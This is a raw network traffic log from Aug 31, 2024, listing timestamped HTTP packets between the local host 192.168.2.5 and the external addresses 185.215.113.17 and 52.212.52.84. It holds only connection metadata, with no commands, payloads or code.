Aug 31, 2024 15:44:20.495518923 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.495582104 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.495582104 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.512902021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.512922049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.512932062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.512988091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.513003111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.513015032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.513025999 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.513025045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.513037920 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.513052940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.514647961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.514658928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.514664888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.514686108 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.514708996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.514720917 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.514729977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.514741898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.514780998 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.514780998 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.514863014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.514883995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515312910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515424013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515439034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515440941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515446901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515449047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515455961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515458107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.515463114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515532017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515542984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515562057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.515568972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515580893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515592098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515599012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.515603065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515614986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515624046 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.515661955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.515661955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.515836000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515917063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515927076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515937090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515947104 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.515955925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515966892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515970945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.515980959 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.515991926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516000986 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516000986 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516066074 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516190052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516201019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516211987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516221046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516232014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516236067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516249895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516262054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516267061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516273022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516279936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516292095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516297102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516303062 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516314030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516319036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516326904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516340017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516344070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516350031 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516361952 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516362906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516376972 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516412973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516412973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516531944 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516587019 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516597033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516617060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516627073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516644955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516732931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516745090 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516756058 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516765118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516767025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516797066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516876936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516907930 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516941071 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516951084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.516969919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.516999960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.517010927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.517020941 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.517030001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.517034054 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.517043114 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.517056942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.517071962 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.518593073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521019936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521064997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521075964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521087885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521121025 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521156073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521167040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521176100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521186113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521205902 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521383047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521392107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521398067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521404028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521413088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521420002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521430969 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521440983 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521450996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521450996 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521471977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521481991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521490097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521500111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521500111 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521511078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521517992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521529913 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521550894 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521567106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521576881 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521586895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521594048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.521594048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521620989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.521620989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.523422956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.525377989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525471926 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525480986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525491953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525501966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525511026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525521040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.525523901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525536060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525553942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.525553942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.525724888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525742054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525752068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525754929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.525763035 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525774002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525775909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.525785923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525796890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.525816917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.525816917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.527059078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.527292967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527304888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527314901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527417898 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527434111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527455091 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.527460098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527471066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527472019 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.527482986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527493954 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527503014 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527513027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527523041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527533054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527543068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527544975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.527544975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.527544975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.527544975 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.527565956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.527630091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.527662992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.528534889 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.534826040 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.534837008 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.536098003 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.545159101 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.545171022 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.545181036 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.545248032 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.545248032 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.592768908 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.592781067 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.592863083 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.592892885 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.592916965 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.593072891 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.593081951 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.593132973 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.593256950 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.593288898 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.593314886 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.593467951 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.593478918 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.593489885 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:20.593494892 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.593547106 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.593547106 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:20.603615046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.603625059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.603643894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.603653908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.603665113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.603674889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.603677034 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.603688002 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.603705883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.603720903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.603720903 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.604538918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.605290890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.605302095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.605308056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.605313063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.605323076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.605340958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.605350971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.605360985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.605372906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.605372906 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.605421066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.605421066 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.605950117 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606019974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606029987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606072903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606084108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606095076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606106043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606138945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606138945 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606180906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606198072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606209993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606220961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606228113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606232882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606244087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606251001 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606251001 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606256962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606266022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606266975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606287956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606287956 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606318951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606475115 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606574059 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606585026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606595993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606602907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606610060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606628895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606637955 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606641054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606652975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606657982 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606664896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606683016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606683969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606695890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606707096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606714010 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606717110 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606738091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606739044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606739044 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606754065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606765032 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606767893 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606776953 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606782913 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606836081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606836081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606862068 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606873989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606884003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606895924 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.606950045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.606950045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607306957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607320070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607331038 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607341051 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607358932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607363939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607363939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607369900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607381105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607389927 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607392073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607407093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607414007 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607440948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607705116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607716084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607728004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607733011 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607779026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607779026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607789993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607800961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607811928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607822895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607834101 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.607842922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607842922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.607856989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.608541012 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:20.611785889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.611805916 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:20.611818075 CEST	80	49727	52.212.52.84	192.168.2.5
